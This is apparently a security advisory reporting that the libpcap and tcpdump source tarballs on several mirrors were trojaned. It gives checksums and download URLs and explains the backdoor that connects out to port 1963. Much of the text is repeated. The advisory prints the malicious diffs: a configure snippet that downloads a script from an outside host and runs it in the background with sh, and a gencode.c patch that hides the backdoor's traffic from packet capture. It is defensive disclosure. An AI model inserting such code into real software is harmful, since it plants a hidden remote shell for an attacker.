* Many Mirrors are infected with the trojan
Background:
* Libpcap provides a packet sniffing library for programs like
Snort.
* Tcpdump is a standard tool for packet sniffing.
Details:
* The trojan contains modifications to the configure script and
gencode.c (in libpcap only).
* The configure script downloads
http://mars.raketti.net/~mash/services which is then sourced
with the shell. It contains an embedded shell script that
creates a C file, and compiles it.
* The program connects to 212.146.0.34 (mars.raketti.net) on port
1963 and reads one of three one byte status codes:
* A - program exits
* D - forks and spawns a shell and does the needed file
descriptor manipulation to redirect it to the existing
connection to 212.146.0.34.
* M - closes connection, sleeps 3600 seconds, and then
reconnects
Hmm... ADM...
* It's important to note that it reuses the same outgoing
connection for the shell. This gets around firewalls that block
incoming connections.
* Gencode.c is modified to force libpcap to ignore packets to/from
the backdoor program, hiding the backdoor program's traffic.
* This is similar to the OpenSSH trojan a few months ago.
MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz
Trojaned sources:
MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz
The (relevant) gencode.c diff:
*** 288,293 ****
--- 289,318 ----
{
extern int n_errors;
int len;
+ int l;
+ char *port = "1963";
+ char *str, *tmp, *new = "not port 1963";
+
+ if (buf && *buf && strstr (buf, port)) {
+ buf = "port 1964";
+ }
+ else {
+ l = strlen (new) + 1;
+ if (!(!buf || !*buf)) {
+ l += strlen (buf);
+ l += 5; /* and */
+ }
+
+ str = (char *)malloc (l);
+ str[0] = '\0';
+ if (!(!buf || !*buf)) {
+ strcpy (str, buf);
+ strcat (str, " and ");
+ }
+
+ strcat (str, new);
+ buf = str;
+ }
* Many Mirrors are infected with the trojan
Background:
* Libpcap provides a packet sniffing library for programs like
Snort.
* Tcpdump is a standard tool for packet sniffing.
Details:
* The trojan contains modifications to the configure script and
gencode.c (in libpcap only).
* The configure script downloads
http://mars.raketti.net/~mash/services which is then sourced
with the shell. It contains an embedded shell script that
creates a C file, and compiles it.
* The program connects to 212.146.0.34 (mars.raketti.net) on port
1963 and reads one of three one byte status codes:
* A - program exits
* D - forks and spawns a shell and does the needed file
descriptor manipulation to redirect it to the existing
connection to 212.146.0.34.
* M - closes connection, sleeps 3600 seconds, and then
reconnects
Hmm... ADM...
* It's important to note that it reuses the same outgoing
connection for the shell. This gets around firewalls that block
incoming connections.
* Gencode.c is modified to force libpcap to ignore packets to/from
the backdoor program, hiding the backdoor program's traffic.
* This is similar to the OpenSSH trojan a few months ago.
Good sources:
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-
0.7.1.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-
3.6.2.tar.gz
http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-
3.7.1.tar.gz
MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz
MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz
MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz
Trojaned sources:
http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz
http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz
http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz
MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz
MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz
MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz
The (relevant) gencode.c diff:
*** 288,293 ****
--- 289,318 ----
{
extern int n_errors;
int len;
+ int l;
+ char *port = "1963";
+ char *str, *tmp, *new = "not port 1963";
+
+ if (buf && *buf && strstr (buf, port)) {
+ buf = "port 1964";
+ }
+ else {
+ l = strlen (new) + 1;
+ if (!(!buf || !*buf)) {
+ l += strlen (buf);
+ l += 5; /* and */
+ }
+
+ str = (char *)malloc (l);
+ str[0] = '\0';
+ if (!(!buf || !*buf)) {
+ strcpy (str, buf);
+ strcat (str, " and ");
+ }
+
+ strcat (str, new);
+ buf = str;
+ }
no_optimize = 0;
n_errors = 0;
***************
The (relevant) configure diff:
+ CNF="services"
+ URL="mars.raketti.net/~mash/$CNF"
! (IFS=","
! ARGS="wget -q -O -,lynx --source,fetch -q -o -"
!
! for i in $ARGS; do
! IFS=" "
! $i $URL 1> $CNF
! if [ -f $CNF ]; then sh $CNF
! exit
! fi
! rm -f $CNF
! done) 1>/dev/null 2>/dev/null &
The "services" payload:
* trojan-script, the non-obfuscated portion (excerpted)
* services, the complete version
Thanks to:
Russell Adams <rladams (at) NO_SPAMadamsinfoserv (dot) com [email concealed]>
Mathew Solnik <msolnik (at) NO_SPAMhlug (dot) org [email concealed]>
Scott Stout <skout (at) NO_SPAMwiretapped (dot) us [email concealed]>
with the Houston Linux Users Group.
Additional thanks to Bruce Locke for interpreting the backdoor code.
Thanks to Gentoo's Portage system for catching the trojaned
--
Mincu Alexandru <alex (at) intelinet (dot) ro [email concealed]>
[ reply ]